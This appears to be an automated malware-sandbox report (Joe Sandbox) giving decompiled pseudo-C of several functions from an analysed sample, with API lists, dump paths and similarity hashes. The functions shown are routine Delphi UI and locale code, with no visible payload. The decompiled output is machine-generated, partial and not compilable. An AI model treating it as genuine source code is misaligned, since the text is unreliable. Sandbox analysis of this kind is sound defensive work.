                                                                                                                                                                                                                            				signed char _t107;
                                                                                                                                                                                                                            				intOrPtr _t113;
                                                                                                                                                                                                                            				intOrPtr _t114;
                                                                                                                                                                                                                            				int _t117;
                                                                                                                                                                                                                            				intOrPtr* _t118;
                                                                                                                                                                                                                            				int _t119;
                                                                                                                                                                                                                            				int* _t121;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				 *_t121 = __ecx;
                                                                                                                                                                                                                            				_t117 = __edx;
                                                                                                                                                                                                                            				_t118 = __eax;
                                                                                                                                                                                                                            				if(__edx ==  *_t121) {
                                                                                                                                                                                                                            					L29:
                                                                                                                                                                                                                            					_t62 =  *0x43ad44; // 0x0
                                                                                                                                                                                                                            					 *((char*)(_t118 + 0x98)) = _t62;
                                                                                                                                                                                                                            					return _t62;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                                                                                                                                                                                                            					_t107 =  *0x43ad3c; // 0x1f
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t107 =  *((intOrPtr*)(__eax + 0x98));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if((_t107 & 0x00000001) == 0) {
                                                                                                                                                                                                                            					_t119 =  *(_t118 + 0x40);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if((_t107 & 0x00000002) == 0) {
                                                                                                                                                                                                                            					_t121[1] =  *(_t118 + 0x44);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                                                                                                                                                                                                            					_t64 =  *(_t118 + 0x48);
                                                                                                                                                                                                                            					_t121[2] = _t64;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if((_t107 & 0x00000001) == 0) {
                                                                                                                                                                                                                            						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                                                                                                                                                                                                            						_t121[2] = _t64;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                                                                                                                                                                                                            						_t121[2] = _t64;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                                                                                                                                                                                                            				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                                                                                                                                                                                                            					_t121[3] =  *(_t118 + 0x4c);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t65 == 0) {
                                                                                                                                                                                                                            						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                                                                                                                                                                                                                            				_t113 =  *0x43ad44; // 0x0
                                                                                                                                                                                                                            				if(_t113 != (_t107 &  *0x43ad40)) {
                                                                                                                                                                                                                            					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t114 =  *0x43ad44; // 0x0
                                                                                                                                                                                                                            				if(_t114 != (_t107 &  *0x43ad48)) {
                                                                                                                                                                                                                            					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                                                                                                                                                                                                            					E004250B0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425094( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				goto L29;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            0x0043ac20
                                                                                                                                                                                                                            0x0043ac0b
                                                                                                                                                                                                                            0x0043ac44
                                                                                                                                                                                                                            0x0043ac49
                                                                                                                                                                                                                            0x0043ac8d
                                                                                                                                                                                                                            0x0043ac51
                                                                                                                                                                                                                            0x0043ac59
                                                                                                                                                                                                                            0x0043ac84
                                                                                                                                                                                                                            0x0043ac5b
                                                                                                                                                                                                                            0x0043ac70
                                                                                                                                                                                                                            0x0043ac70
                                                                                                                                                                                                                            0x0043ac59
                                                                                                                                                                                                                            0x0043aca5
                                                                                                                                                                                                                            0x0043acb3
                                                                                                                                                                                                                            0x0043acbb
                                                                                                                                                                                                                            0x0043acce
                                                                                                                                                                                                                            0x0043acce
                                                                                                                                                                                                                            0x0043acdc
                                                                                                                                                                                                                            0x0043ace4
                                                                                                                                                                                                                            0x0043acf7
                                                                                                                                                                                                                            0x0043acf7
                                                                                                                                                                                                                            0x0043ad01
                                                                                                                                                                                                                            0x0043ad21
                                                                                                                                                                                                                            0x0043ad21
                                                                                                                                                                                                                            0x00000000

APIs
• MulDiv.KERNEL32(?,?,?), ref: 0043ABD1
• MulDiv.KERNEL32(?,?,?), ref: 0043ABEB
• MulDiv.KERNEL32(?,?,?), ref: 0043AC19
• MulDiv.KERNEL32(?,?,?), ref: 0043AC2F
• MulDiv.KERNEL32(?,?,?), ref: 0043AC67
• MulDiv.KERNEL32(?,?,?), ref: 0043AC7F
• MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACC9
• MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACF2
• MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043AD18
  • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
• Instruction ID: d10f16ddfd9cc23340e03066ebc6cedff9c8bd4490aae9a17c26e6f9981b1e60
• Opcode Fuzzy Hash: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
• Instruction Fuzzy Hash: C6518E70648744AFC320DB29C841B6BB7E9AF59304F04A81EB9D5C7792C63DEC508B1A
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                                                                                            			E0043BA38(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				struct HDC__* _v12;
                                                                                                                                                                                                                            				struct HDC__* _v16;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                            				int _v36;
                                                                                                                                                                                                                            				struct HDC__* _t33;
                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                            				int _t74;
                                                                                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                                                                                            				int _t83;
                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                            				int _t89;
                                                                                                                                                                                                                            				void* _t92;
                                                                                                                                                                                                                            				void* _t93;
                                                                                                                                                                                                                            				intOrPtr _t94;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t92 = _t93;
                                                                                                                                                                                                                            				_t94 = _t93 + 0xffffffe0;
                                                                                                                                                                                                                            				_v5 = __ecx;
                                                                                                                                                                                                                            				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
                                                                                                                                                                                                                            				if(_v5 == 0) {
                                                                                                                                                                                                                            					_push(__edx);
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					_pop(_t88);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(__edx);
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					asm("movsd");
                                                                                                                                                                                                                            					_pop(_t88);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v12 = GetDesktopWindow();
                                                                                                                                                                                                                            				_push(0x402);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t33 = _v12;
                                                                                                                                                                                                                            				_push(_t33);
                                                                                                                                                                                                                            				L00407640();
                                                                                                                                                                                                                            				_v16 = _t33;
                                                                                                                                                                                                                            				_push(_t92);
                                                                                                                                                                                                                            				_push(0x43bb53);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t94;
                                                                                                                                                                                                                            				_v20 = SelectObject(_v16, E00425610( *((intOrPtr*)(_t88 + 0x40))));
                                                                                                                                                                                                                            				_t89 = _v36;
                                                                                                                                                                                                                            				_t83 = _v32;
                                                                                                                                                                                                                            				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
                                                                                                                                                                                                                            				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
                                                                                                                                                                                                                            				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
                                                                                                                                                                                                                            				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
                                                                                                                                                                                                                            				SelectObject(_v16, _v20);
                                                                                                                                                                                                                            				_pop(_t80);
                                                                                                                                                                                                                            				 *[fs:eax] = _t80;
                                                                                                                                                                                                                            				_push(0x43bb5a);
                                                                                                                                                                                                                            				_push(_v16);
                                                                                                                                                                                                                            				_t72 = _v12;
                                                                                                                                                                                                                            				_push(_t72);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				return _t72;
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0043BA6F
                                                                                                                                                                                                                            • 73C9ACE0.USER32(?,00000000,00000402), ref: 0043BA82
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0043BAA5
                                                                                                                                                                                                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043BACB
                                                                                                                                                                                                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043BAED
                                                                                                                                                                                                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043BB0C
                                                                                                                                                                                                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043BB26
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0043BB33
                                                                                                                                                                                                                            • 73C9B380.USER32(?,?,0043BB5A,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 0043BB4D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ObjectSelect$B380DesktopWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 989747725-0
                                                                                                                                                                                                                            • Opcode ID: 1bbbec0ae95a970e8fbfea3617b8bca78539cc0793b36e6b4bd19b83dc557e65
                                                                                                                                                                                                                            • Instruction ID: e1e64ebeb7b5d23d6db400034beff9ba963c624bbe95d31bbb4f2864b739462b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bbbec0ae95a970e8fbfea3617b8bca78539cc0793b36e6b4bd19b83dc557e65
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7310AB6E04619AFDB01DEEDCC85EAFBBBCEF09704B408465B504F7241C679AD008BA5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E0040E2E8(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                            				void* _t133;
                                                                                                                                                                                                                            				intOrPtr _t183;
                                                                                                                                                                                                                            				intOrPtr _t193;
                                                                                                                                                                                                                            				intOrPtr _t194;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t191 = __esi;
                                                                                                                                                                                                                            				_t190 = __edi;
                                                                                                                                                                                                                            				_t193 = _t194;
                                                                                                                                                                                                                            				_t133 = 8;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t133 = _t133 - 1;
                                                                                                                                                                                                                            				} while (_t133 != 0);
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(_t193);
                                                                                                                                                                                                                            				_push(0x40e5b3);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t194;
                                                                                                                                                                                                                            				E0040E174();
                                                                                                                                                                                                                            				E0040CA14(__ebx, __edi, __esi);
                                                                                                                                                                                                                            				_t196 =  *0x49e750;
                                                                                                                                                                                                                            				if( *0x49e750 != 0) {
                                                                                                                                                                                                                            					E0040CBEC(__esi, _t196);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t132 = GetThreadLocale();
                                                                                                                                                                                                                            				E0040C964(_t43, 0, 0x14,  &_v20);
                                                                                                                                                                                                                            				E00404A14(0x49e684, _v20);
                                                                                                                                                                                                                            				E0040C964(_t43, 0x40e5c8, 0x1b,  &_v24);
                                                                                                                                                                                                                            				 *0x49e688 = E00409664(0x40e5c8, 0, _t196);
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e5c8, 0x1c,  &_v28);
                                                                                                                                                                                                                            				 *0x49e689 = E00409664(0x40e5c8, 0, _t196);
                                                                                                                                                                                                                            				 *0x49e68a = E0040C9B0(_t132, 0x2c, 0xf);
                                                                                                                                                                                                                            				 *0x49e68b = E0040C9B0(_t132, 0x2e, 0xe);
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e5c8, 0x19,  &_v32);
                                                                                                                                                                                                                            				 *0x49e68c = E00409664(0x40e5c8, 0, _t196);
                                                                                                                                                                                                                            				 *0x49e68d = E0040C9B0(_t132, 0x2f, 0x1d);
                                                                                                                                                                                                                            				E0040C964(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                                                                                                                                                                            				E0040CC9C(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                                                                                                                                                                            				E00404A14(0x49e690, _v36);
                                                                                                                                                                                                                            				E0040C964(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                                                                                                                                                                            				E0040CC9C(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                                                                                                                                                                            				E00404A14(0x49e694, _v44);
                                                                                                                                                                                                                            				 *0x49e698 = E0040C9B0(_t132, 0x3a, 0x1e);
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e5fc, 0x28,  &_v52);
                                                                                                                                                                                                                            				E00404A14(0x49e69c, _v52);
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e608, 0x29,  &_v56);
                                                                                                                                                                                                                            				E00404A14(0x49e6a0, _v56);
                                                                                                                                                                                                                            				E004049C0( &_v12);
                                                                                                                                                                                                                            				E004049C0( &_v16);
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e5c8, 0x25,  &_v60);
                                                                                                                                                                                                                            				_t104 = E00409664(0x40e5c8, 0, _t196);
                                                                                                                                                                                                                            				_t197 = _t104;
                                                                                                                                                                                                                            				if(_t104 != 0) {
                                                                                                                                                                                                                            					E00404A58( &_v8, 0x40e620);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00404A58( &_v8, 0x40e614);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e5c8, 0x23,  &_v64);
                                                                                                                                                                                                                            				_t111 = E00409664(0x40e5c8, 0, _t197);
                                                                                                                                                                                                                            				_t198 = _t111;
                                                                                                                                                                                                                            				if(_t111 == 0) {
                                                                                                                                                                                                                            					E0040C964(_t132, 0x40e5c8, 0x1005,  &_v68);
                                                                                                                                                                                                                            					if(E00409664(0x40e5c8, 0, _t198) != 0) {
                                                                                                                                                                                                                            						E00404A58( &_v12, 0x40e63c);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00404A58( &_v16, 0x40e62c);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_v12);
                                                                                                                                                                                                                            				_push(_v8);
                                                                                                                                                                                                                            				_push(":mm");
                                                                                                                                                                                                                            				_push(_v16);
                                                                                                                                                                                                                            				E00404D40();
                                                                                                                                                                                                                            				_push(_v12);
                                                                                                                                                                                                                            				_push(_v8);
                                                                                                                                                                                                                            				_push(":mm:ss");
                                                                                                                                                                                                                            				_push(_v16);
                                                                                                                                                                                                                            				E00404D40();
                                                                                                                                                                                                                            				 *0x49e752 = E0040C9B0(_t132, 0x2c, 0xc);
                                                                                                                                                                                                                            				_pop(_t183);
                                                                                                                                                                                                                            				 *[fs:eax] = _t183;
                                                                                                                                                                                                                            				_push(E0040E5BA);
                                                                                                                                                                                                                            				return E004049E4( &_v68, 0x10);
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,0040E5B3,?,?,00000000,00000000), ref: 0040E31E
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                            			E004388F0(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				struct HWND__* _v24;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				struct tagRECT _v48;
                                                                                                                                                                                                                            				struct tagRECT _v64;
                                                                                                                                                                                                                            				struct HWND__* _t53;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                            				void* _t102;
                                                                                                                                                                                                                            				intOrPtr* _t104;
                                                                                                                                                                                                                            				intOrPtr _t106;
                                                                                                                                                                                                                            				intOrPtr _t110;
                                                                                                                                                                                                                            				intOrPtr _t112;
                                                                                                                                                                                                                            				struct HWND__* _t113;
                                                                                                                                                                                                                            				intOrPtr _t114;
                                                                                                                                                                                                                            				intOrPtr _t116;
                                                                                                                                                                                                                            				intOrPtr _t117;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t102 = __ecx;
                                                                                                                                                                                                                            				_t101 = __eax;
                                                                                                                                                                                                                            				_v5 = 1;
                                                                                                                                                                                                                            				_t113 = E00438D40(_a4 + 0xfffffff7);
                                                                                                                                                                                                                            				_v24 = _t113;
                                                                                                                                                                                                                            				_t53 = GetWindow(_t113, 4);
                                                                                                                                                                                                                            				_t104 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                            					if(_v24 == 0) {
                                                                                                                                                                                                                            						L25:
                                                                                                                                                                                                                            						return _v5;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t114 = _t101;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t55 =  *((intOrPtr*)(_t114 + 0x30));
                                                                                                                                                                                                                            						if(_t55 == 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t114 = _t55;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t112 = E00441704(_t114);
                                                                                                                                                                                                                            					_v28 = _t112;
                                                                                                                                                                                                                            					if(_t112 == _v24) {
                                                                                                                                                                                                                            						goto L25;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t13 = _a4 - 0x10; // 0xe87d83e8
                                                                                                                                                                                                                            					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
                                                                                                                                                                                                                            					if(_t60 == 0) {
                                                                                                                                                                                                                            						_t19 = _a4 - 0x10; // 0xe87d83e8
                                                                                                                                                                                                                            						_t106 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            						__eflags = E00403D78( *_t19, _t106);
                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            							_v32 = 0;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t21 = _a4 - 0x10; // 0xe87d83e8
                                                                                                                                                                                                                            							_v32 = E00441704( *_t21);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L19:
                                                                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                                                                            						_t65 = _a4;
                                                                                                                                                                                                                            						_v20 =  *((intOrPtr*)(_t65 - 9));
                                                                                                                                                                                                                            						_v16 =  *((intOrPtr*)(_t65 - 5));
                                                                                                                                                                                                                            						_push( &_v32);
                                                                                                                                                                                                                            						_push(E00438884);
                                                                                                                                                                                                                            						_push(GetCurrentThreadId());
                                                                                                                                                                                                                            						L004075C8();
                                                                                                                                                                                                                            						_t126 = _v12;
                                                                                                                                                                                                                            						if(_v12 == 0) {
                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						GetWindowRect(_v24,  &_v48);
                                                                                                                                                                                                                            						_push(_a4 + 0xfffffff7);
                                                                                                                                                                                                                            						_push(_a4 - 1);
                                                                                                                                                                                                                            						E00403DE8(_t101, _t126);
                                                                                                                                                                                                                            						_t78 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						_t110 =  *0x4360a0; // 0x4360ec
                                                                                                                                                                                                                            						if(E00403D78(_t78, _t110) == 0) {
                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                            							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                                                                                                                                                                                                            								_v5 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t84 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t86 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						if(E00441704( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L23;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t116 = _t60;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t93 =  *((intOrPtr*)(_t116 + 0x30));
                                                                                                                                                                                                                            						if(_t93 == 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t116 = _t93;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v32 = E00441704(_t116);
                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t117 = E00437E5C(_v24, _t102);
                                                                                                                                                                                                                            				if(_t117 == 0) {
                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t98 =  *((intOrPtr*)(_t117 + 0x30));
                                                                                                                                                                                                                            						if(_t98 == 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t117 = _t98;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v24 = E00441704(_t117);
                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
































                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00438D40: WindowFromPoint.USER32(00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438D46
                                                                                                                                                                                                                              • Part of subcall function 00438D40: GetParent.USER32(00000000), ref: 00438D5D
                                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000004), ref: 00438912
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004389E6
                                                                                                                                                                                                                            • 73C9AC10.USER32(00000000,00438884,?,00000000,00000004,?,-0000000C,?), ref: 004389EC
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00438A03
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 00438A71
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetPropA.USER32 ref: 00437E9E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
